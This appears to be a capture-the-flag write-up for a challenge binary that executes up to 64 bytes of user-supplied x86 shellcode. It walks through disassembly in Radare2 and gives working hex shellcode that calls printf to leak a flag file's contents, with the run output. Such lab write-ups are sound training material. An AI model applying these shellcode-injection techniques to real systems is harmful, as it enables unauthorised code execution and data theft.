Our operatives found this site, which appears to control some of the androids’ infrastructure! The robots love x86 assembly; the only thing easier for them to work with is binary. 64 bytes should be enough for anyone.
This URL is unique to your team! Don’t share it with competitors!
The link contains:
Download bytes challenge binary. You can send up to 64 bytes (hex encoded) as the first argument to the binary. The passed in bytes will be executed. The goal is to read the contents of the file in env\['WUNTEE\_CHALLENGE\_FLAG'\]. Run your input here: \[submit field\]
Upon entering anything, the following is displayed:
Output: Shellcode location: 0xf77b8000 Flag location: 0xfff16460 Status: pid 156 SIGSEGV (signal 11) (core dumped)
Luckily, the binary has been provided. Per the challenge prompt, and confirmed with Radare2, 64 hex bytes were entered. If more than 64 hex bytes were entered, the binary would print “The input you provided was bad.”
The binary reads the environment variable “WUNTEE_CHALLENGE_FLAG,” which is a path to a file. The file contains the flag. If the environment variable is not set, the program will print “%s environmental variable not set. Could not read flag.\n” and exit. However, if the environment variable is set, the program will segfault at 0x080488ec.
./bytes aa Shellcode location: 0xf773a000 Flag location: 0xffa70c40 Segmentation fault
The last valid instruction the binary executes is at 0x080488ec and is jmp dword [local_18h]. local_18h is the address of user input. For example, if 90 was passed to the binary, the program would execute nop. In order to print the flag, shellcode (x86 assembly) needs to be writeen to print the contents of the file in “WUNTEE_CHALLENGE_FLAG.”
0xf7706000 00:0000 90 nop 0xf7706001 00:0000 83c410 add esp, 0x10 0xf7706004 00:0000 54 push esp 0xf7706005 00:0000 681c8a0408 push str.Shellcode_location:__p_n ; 0x8048a1c ; "Shellcode location: %p\n" 0xf770600a 00:0000 ff258c9c0408 jmp dword [reloc.printf_140] ; 0x8049c8c ; "0yW\xf7\xf0\xbcX\xf7"
This shellcode (9083c41054681c8a0408ff258c9c0408) moves the contents of the file to esp, pushes esp, then pushes a string, and finally calls printf.
root@kali:bytes# ./bytes 9083c41054681c8a0408ff258c9c0408 Shellcode location: 0xf7793000 Flag location: 0xffe44560 WOHOO THIS IS THE CONTENTS OF THE FILE Segmentation fault